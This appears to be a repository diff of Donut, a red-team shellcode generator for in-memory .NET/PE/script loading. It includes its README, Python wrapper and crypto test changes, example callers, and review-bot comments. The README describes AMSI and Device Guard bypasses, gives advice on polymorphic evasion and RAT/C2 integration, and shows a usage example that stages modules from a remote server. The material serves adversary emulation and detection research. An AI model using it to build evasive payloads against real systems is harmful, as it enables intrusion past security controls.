29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+0
-103
donut_shellcode.egg-info/SOURCES.txt less more
0 LICENSE
1 MANIFEST.in
2 Makefile
3 Makefile.mingw
4 Makefile.msvc
5 README.md
6 donut.c
7 donutmodule.c
8 encrypt.c
9 hash.c
10 setup.py
11 version-release-notes.txt
12 ./donut.c
13 ./donutmodule.c
14 ./encrypt.c
15 ./hash.c
16 ./DonutTest/hello.c
17 ./DonutTest/testcase.c
18 ./include/mmap-windows.c
19 ./payload/activescript.c
20 ./payload/bypass.c
21 ./payload/clib.c
22 ./payload/getpc.c
23 ./payload/http_client.c
24 ./payload/inject.c
25 ./payload/inmem_dotnet.c
26 ./payload/inmem_pe.c
27 ./payload/inmem_script.c
28 ./payload/inmem_xsl.c
29 ./payload/payload.c
30 ./payload/peb.c
31 ./payload/runsc.c
32 ./payload/wscript.c
33 ./payload/exe2h/exe2h.c
34 ./payload/exe2h/mmap-windows.c
35 ./payload/test/api_test.c
36 ./payload/test/call_api_dll.c
37 ./payload/test/hello.c
38 docs/2019-08-21-Python_Extension.md
39 docs/2019-5-31-Apple-Fritter.md
40 docs/2019-5-9-Introducing-Donut.md
41 docs/api.html
42 docs/api.md
43 donut_shellcode.egg-info/PKG-INFO
44 donut_shellcode.egg-info/SOURCES.txt
45 donut_shellcode.egg-info/dependency_links.txt
46 donut_shellcode.egg-info/top_level.txt
47 donut_shellcode.egg-info/zip-safe
48 include/donut.h
49 include/encrypt.h
50 include/hash.h
51 include/mmap-windows.c
52 include/mmap.h
53 include/pe.h
54 include/poppack.h
55 include/pshpack1.h
56 include/pshpack2.h
57 include/pshpack4.h
58 include/pshpack8.h
59 include/wintypes.h
60 lib/donut.h
61 payload/Makefile.mingw
62 payload/Makefile.msvc
63 payload/activescript.c
64 payload/activescript.h
65 payload/amsi.h
66 payload/bypass.c
67 payload/call_api.asm
68 payload/call_api_bin.h
69 payload/clib.c
70 payload/clr.h
71 payload/getpc.c
72 payload/http_client.c
73 payload/inject.c
74 payload/inmem_dotnet.c
75 payload/inmem_pe.c
76 payload/inmem_script.c
77 payload/inmem_xsl.c
78 payload/order.txt
79 payload/payload.c
80 payload/payload.h
81 payload/payload_exe_x64.h
82 payload/payload_exe_x86.h
83 payload/peb.c
84 payload/peb.h
85 payload/runsc.c
86 payload/winapi.h
87 payload/wscript.c
88 payload/wscript.h
89 payload/xmldom.h
90 payload/exe2h/Makefile
91 payload/exe2h/Makefile.mingw
92 payload/exe2h/Makefile.msvc
93 payload/exe2h/exe2h.c
94 payload/exe2h/exe2h.obj
95 payload/exe2h/mmap-windows.c
96 payload/exe2h/mmap-windows.obj
97 payload/exe2h/mmap.h
98 payload/test/api_test.c
99 payload/test/call_api_dll.c
100 payload/test/hello.c
101 payload/test/hello.cs
102 payload/test/rdt.cpp
+0
-1
donut_shellcode.egg-info/dependency_links.txt less more
0
+0
-1
donut_shellcode.egg-info/top_level.txt less more
0 donut
+0
-1
donut_shellcode.egg-info/zip-safe less more
0
3333 #include <Python.h>
3434 #include "donut.h"
3535
36
3736 static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) {
38 int *arch = NULL;
39 int *bypass = NULL;
40 char *appdomain = NULL;
41 char *file = NULL;
42 char *runtime = NULL;
43 char *url = NULL;
44 char *cls = NULL;
45 char *method = NULL;
46 char *params = NULL;
47
48 int err;
49
50 static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL};
51 if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, &params, &runtime, &appdomain)) {
37 char *input = NULL; // input file to execute in-memory
38
39 int arch = 0; // target CPU architecture or mode
40 int bypass = 0; // AMSI/WDLP bypassing behavior
41 int compress = 0; // compress input file
42 int entropy = 0; // whether to randomize API hashes and use encryption
43 int format = 0; // output format
44 int exit_opt = 0; // exit process or exit thread
45 int thread = 0; // run unmanaged entrypoint as a thread
46 char *oep = NULL; // creates new thread for loader and continues execution at specified address provided in hexadecimal format
47
48 char *output = NULL; // name of loader stored on disk
49
50 char *runtime = NULL; // runtime version
51 char *domain = NULL; // app domain name to use
52 char *cls = NULL; // class name
53 char *method = NULL; // method name
54
55 char *params = NULL; // parameters for method
56 int unicode = 0; // param is converted to unicode before being passed to unmanaged DLL function
57
58 char *server = NULL; // HTTP server to download module from
59 char *modname = NULL; // name of module stored on HTTP server
60
61 static char *kwlist[] = {
62 "file", "arch", "bypass", "compress", "entropy",
63 "format", "exit_opt", "thread", "oep", "output",
64 "runtime", "appdomain", "cls", "method", "params",
65 "unicode", "server", "url", "modname", NULL};
66
67 if (!PyArg_ParseTupleAndKeywords(
68 args, keywds, "s|iiiiiiisssssssisss", kwlist, &input, &arch,
69 &bypass, &compress, &entropy, &format, &exit_opt, &thread,
70 &oep, &output, &runtime, &domain, &cls, &method, &params,
71 &unicode, &server, &server, &modname))
72 {
5273 return NULL;
5374 }
5475
5677
5778 // zero initialize configuration
5879 memset(&c, 0, sizeof(c));
59
60 // default type is position independent code for dual-mode (x86 + amd64)
61 c.inst_type = DONUT_INSTANCE_PIC;
62 c.arch = DONUT_ARCH_X84;
80
81 // default settings
82 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
83 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
6384 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
64
85 c.format = DONUT_FORMAT_BINARY; // default output format
86 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
87 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
88 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
89 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
90
91 // input file
92 if(input != NULL) {
93 strncpy(c.input, input, DONUT_MAX_NAME - 1);
94 }
95
6596 // target cpu architecture
66 if (arch != NULL) {
97 if(arch != 0) {
6798 c.arch = arch;
6899 }
69
70100 // bypass options
71 if (bypass != NULL) {
101 if(bypass != 0) {
72102 c.bypass = bypass;
73103 }
74
75 // name of appdomain to use
76 if (appdomain != NULL) {
77 strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1);
78 }
79
80 // assembly to use
81 if (file != NULL) {
82 strncpy(c.file, file, DONUT_MAX_NAME - 1);
83 }
84
85 //runtime version to use
86 if (runtime != NULL) {
104 // class of .NET assembly
105 if(cls != NULL) {
106 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
107 }
108 // name of domain to use for .NET assembly
109 if(domain != NULL) {
110 strncpy(c.domain, domain, DONUT_MAX_NAME - 1);
111 }
112 // encryption options
113 if(entropy != 0) {
114 c.entropy = entropy;
115 }
116 // output format
117 if(format != 0) {
118 c.format = format;
119 }
120 // method of .NET assembly
121 if(method != NULL) {
122 strncpy(c.method, method, DONUT_MAX_NAME - 1);
123 }
124 // module name
125 if(modname != NULL) {
126 strncpy(c.modname, modname, DONUT_MAX_NAME - 1);
127 }
128 // output file for loader
129 if(output != NULL) {
130 strncpy(c.output, output, DONUT_MAX_NAME - 1);
131 }
132 // parameters to method, DLL function or command line for unmanaged EXE
133 if(params != NULL) {
134 strncpy(c.param, params, DONUT_MAX_NAME - 1);
135 }
136 // runtime version to use for .NET DLL / EXE
137 if(runtime != NULL) {
87138 strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1);
88139 }
89
90 // url of remote assembly
91 if (url != NULL) {
92 strncpy(c.url, url, DONUT_MAX_URL - 2);
93 c.inst_type = DONUT_INSTANCE_URL;
94 }
95
96 // class
97 if (cls != NULL) {
98 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
99 }
100
101 // method or exported api symbol
102 if (method != NULL) {
103 strncpy(c.method, method, DONUT_MAX_NAME - 1);
104 }
105
106 // parameters to method/exported API
107 if (params != NULL) {
108 strncpy(c.param, params, sizeof(c.param) - 1);
109 }
110
111 err = DonutCreate(&c);
112
113 /*
114 if (!(c.pic_len > 0)) {
115 return NULL;
116 }
117 */
118
140 // run entrypoint of unmanaged EXE as a thread
141 if(thread != 0) {
142 c.thread = 1;
143 }
144 // server
145 if(server != NULL) {
146 strncpy(c.server, server, DONUT_MAX_NAME - 2);
147 c.inst_type = DONUT_INSTANCE_HTTP;
148 }
149 // convert param to unicode? only applies to unmanaged DLL function
150 if(unicode != 0) {
151 c.unicode = 1;
152 }
153 // call RtlExitUserProcess to terminate host process
154 if(exit_opt != 0) {
155 c.exit_opt = exit_opt;
156 }
157 // fork a new thread and execute address of original entry point
158 if(oep != NULL) {
159 c.oep = strtoull(oep, NULL, 16);
160 }
161 // pack/compress input file
162 if(compress != 0) {
163 c.compress = compress;
164 }
165
166 int err = DonutCreate(&c);
167
168 // printf("Error : %i\n", err);
169
119170 PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len);
120171
121172 DonutDelete(&c);
130181 Donut_Create, // C wrapper function
131182 METH_VARARGS|METH_KEYWORDS,
132183 "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation
133 }, {
134 NULL, NULL, 0, NULL
135 }
184 },
185
186 {NULL, NULL, 0, NULL}
136187 };
137188
138189 // modules definition
3030
3131 #include "encrypt.h"
3232
33 #include <stdio.h>
34 #include <string.h>
35
3336 static void chaskey(void *mk, void *p) {
3437 uint32_t i,*w=p,*k=mk;
3538
5356 }
5457
5558 // encrypt/decrypt data in counter mode
56 void donut_encrypt(void *mk, void *ctr, void *data, size_t len) {
59 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len) {
5760 uint8_t x[CIPHER_BLK_LEN],
5861 *p=(uint8_t*)data,
5962 *c=(uint8_t*)ctr;
60 int i, r;
63 uint32_t i, r;
6164
6265 while(len) {
6366 // copy counter+nonce to local buffer
7780 len -= r; p += r;
7881
7982 // update counter
80 for(i=CIPHER_BLK_LEN;i>0;i--)
83 for(i=CIPHER_BLK_LEN;(int)i>0;i--)
8184 if(++c[i-1]) break;
8285 }
8386 }
8487
8588 #ifdef TEST
8689
90 #include <stdint.h>
8791 #include <stdio.h>
92 #include <stdlib.h>
8893 #include <string.h>
89 #include <stdint.h>
94 #include <sys/stat.h>
95 #include <inttypes.h>
96 #include <fcntl.h>
97
98 #if defined(_WIN32) || defined(_WIN64)
99 #define WINDOWS
100 #include <windows.h>
101 #pragma comment(lib, "advapi32.lib")
102 #else
103 #include <unistd.h>
104 #endif
105
106 void bin2hex(const char *str, void *bin, int len) {
107 int i;
108 uint8_t *p = (uint8_t*)bin;
109
110 printf("%s[%i] = { ", str, len);
111
112 for(i=0;i<len;i++) {
113 printf("0x%02x", p[i]);
114 if((i+1) != len) putchar(',');
115 }
116 printf(" };\n");
117 }
118
119 // generate test vector
120 void gen_crypto_tv(void *mk, void *ctr) {
121 uint8_t key[16], data[77], tmp[16];
122 int i, j;
123
124 memset(data, 0, sizeof(data));
125 memcpy(key, mk, 16);
126 memcpy(tmp, ctr, 16);
127
128 for(i=0; i<128; i++) {
129 donut_encrypt(key, tmp, data, sizeof(data));
130 // update key with first 16 bytes of ciphertext
131 for(j=0; j<16; j++) key[j] ^= data[j];
132 }
133 bin2hex("donut_crypt_tv", data, 16);
134 }
90135
91136 // 128-bit master key
92 uint8_t key[16] =
137 uint8_t key_tv[16] =
93138 { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29,
94139 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f };
95140
96141 // 128-bit plain text
97 uint8_t plain[16]=
142 uint8_t plain_tv[16]=
98143 { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e,
99144 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 };
100145
101146 // 128-bit cipher text
102 uint8_t cipher[16] =
147 uint8_t cipher_tv[16] =
103148 { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b,
104149 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 };
105150
151 // 128-bit counter
152 uint8_t ctr_tv[16] =
153 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
154 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x88, 0x93 };
155
156 // 128-bit ciphertext for testing donut_encrypt
157 uint8_t donut_crypt_tv[16] =
158 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
159 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x8b, 0x13 };
160
161 int crypto_test(void) {
162 uint8_t key[16], data[77], tmp[16];
163 int i, j;
164
165 memset(data, 0, sizeof(data));
166 memcpy(key, key_tv, 16);
167 memcpy(tmp, ctr_tv, 16);
168
169 for(i=0; i<128; i++) {
170 // encrypt data
171 donut_encrypt(key, tmp, data, sizeof(data));
172 // update key with first 16 bytes of ciphertext
173 for(j=0; j<16; j++) key[j] ^= data[j];
174 }
175 return (memcmp(tmp, donut_crypt_tv, 16) == 0);
176 }
177
106178 int main(void) {
107 uint8_t data[16];
179 uint8_t tmp1[16];
108180 int equ;
109181
110 memcpy(data, plain, 16);
111 chaskey(key, data);
112 equ = (memcmp(data, cipher, 16)==0);
182 // Chaskey test
183 memcpy(tmp1, plain_tv, 16);
184 chaskey(key_tv, tmp1);
185 equ = (memcmp(tmp1, cipher_tv, 16)==0);
113186 printf("Chaskey test : %s\n", equ ? "OK" : "FAILED");
187 printf("Donut Encrypt test : %s\n", crypto_test() ? "OK" : "FAILED");
114188 return 0;
115189 }
116190
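Review bot: `crypto_test` compares `tmp` — the counter buffer — with `donut_crypt_tv`, so it never checks the Chaskey keystream; the checked-in vector is exactly `ctr_tv` advanced by 640 (0x8893 + 0x280 = 0x8b13, which is what 128 calls × 5 blocks of a 77-byte buffer produce), so it appears to have been captured from the counter rather than the ciphertext, even though `gen_crypto_tv` prints `data`. A test that passes with any key gives no protection against a regression in `chaskey` or in the XOR loop of `donut_encrypt`. Change the return to `return (memcmp(data, donut_crypt_tv, 16) == 0);`, regenerate the vector with `gen_crypto_tv`, and reword the comment above `donut_crypt_tv` to say it is the first 16 bytes of the final ciphertext.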
0
1 // dynamic example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // function pointers
11 DonutCreate_t _DonutCreate;
12 DonutDelete_t _DonutDelete;
13 DonutError_t _DonutError;
14
15 // need at least a file
16 if(argc != 2) {
17 printf(" [ usage: donut_dynamic <file>\n");
18 return 0;
19 }
20
21 // try load donut.dll or donut.so
22 #if defined(WINDOWS)
23 HMODULE m = LoadLibrary("donut.dll");
24 if(m != NULL) {
25 _DonutCreate = (DonutCreate_t)GetProcAddress(m, "DonutCreate");
26 _DonutDelete = (DonutDelete_t)GetProcAddress(m, "DonutDelete");
27 _DonutError = (DonutError_t) GetProcAddress(m, "DonutError");
28
29 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
30 printf(" [ Unable to resolve Donut API.\n");
31 return 0;
32 }
33 } else {
34 printf(" [ Unable to load donut.dll.\n");
35 return 0;
36 }
37 #else
38 void *m = dlopen("donut.so", RTLD_LAZY);
39 if(m != NULL) {
40 _DonutCreate = (DonutCreate_t)dlsym(m, "DonutCreate");
41 _DonutDelete = (DonutDelete_t)dlsym(m, "DonutDelete");
42 _DonutError = (DonutError_t) dlsym(m, "DonutError");
43
44 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
45 printf(" [ Unable to resolve Donut API.\n");
46 return 0;
47 }
48 } else {
49 printf(" [ Unable to load donut.so.\n");
50 return 0;
51 }
52 #endif
53
54 memset(&c, 0, sizeof(c));
55
56 // copy input file
57 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
58
59 // default settings
60 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
61 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
62 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
63 c.format = DONUT_FORMAT_BINARY; // default output format
64 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
65 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
66 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
67 c.thread = 1; // run entrypoint as a thread
68 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
69
70 // generate the shellcode
71 err = _DonutCreate(&c);
72 if(err != DONUT_ERROR_SUCCESS) {
73 printf(" [ Error : %s\n", _DonutError(err));
74 return 0;
75 }
76
77 printf(" [ loader saved to %s\n", c.output);
78
79 _DonutDelete(&c);
80 return 0;
81 }
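Review bot: Every error path in this example returns 0 (usage error, failed load, unresolved symbols, `_DonutCreate` failure), so a caller or CI script cannot tell a failed run from a successful one; the static example that follows has the same issue. Return a non-zero status on those paths, e.g. `return 1;` after each error `printf`. `lstrcpyn` is a Win32 API, so the Linux build presumably relies on a mapping in `donut.h` — worth confirming, or use `strncpy(c.input, argv[1], DONUT_MAX_NAME - 1);` as the other callers in this commit do. The loaded library is also never released with `FreeLibrary`/`dlclose` before returning.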
0
1 // static example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // need at least a file
11 if(argc != 2) {
12 printf(" [ usage: donut_static <file>\n");
13 return 0;
14 }
15
16 memset(&c, 0, sizeof(c));
17
18 // copy input file
19 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
20
21 // default settings
22 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
23 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
24 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
25 c.format = DONUT_FORMAT_BINARY; // default output format
26 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
27 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
28 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
29 c.thread = 1; // run entrypoint as a thread
30 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
31
32 // generate the shellcode
33 err = DonutCreate(&c);
34 if(err != DONUT_ERROR_SUCCESS) {
35 printf(" [ Error : %s\n", DonutError(err));
36 return 0;
37 }
38
39 printf(" [ loader saved to %s\n", c.output);
40
41 DonutDelete(&c);
42 return 0;
43 }
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
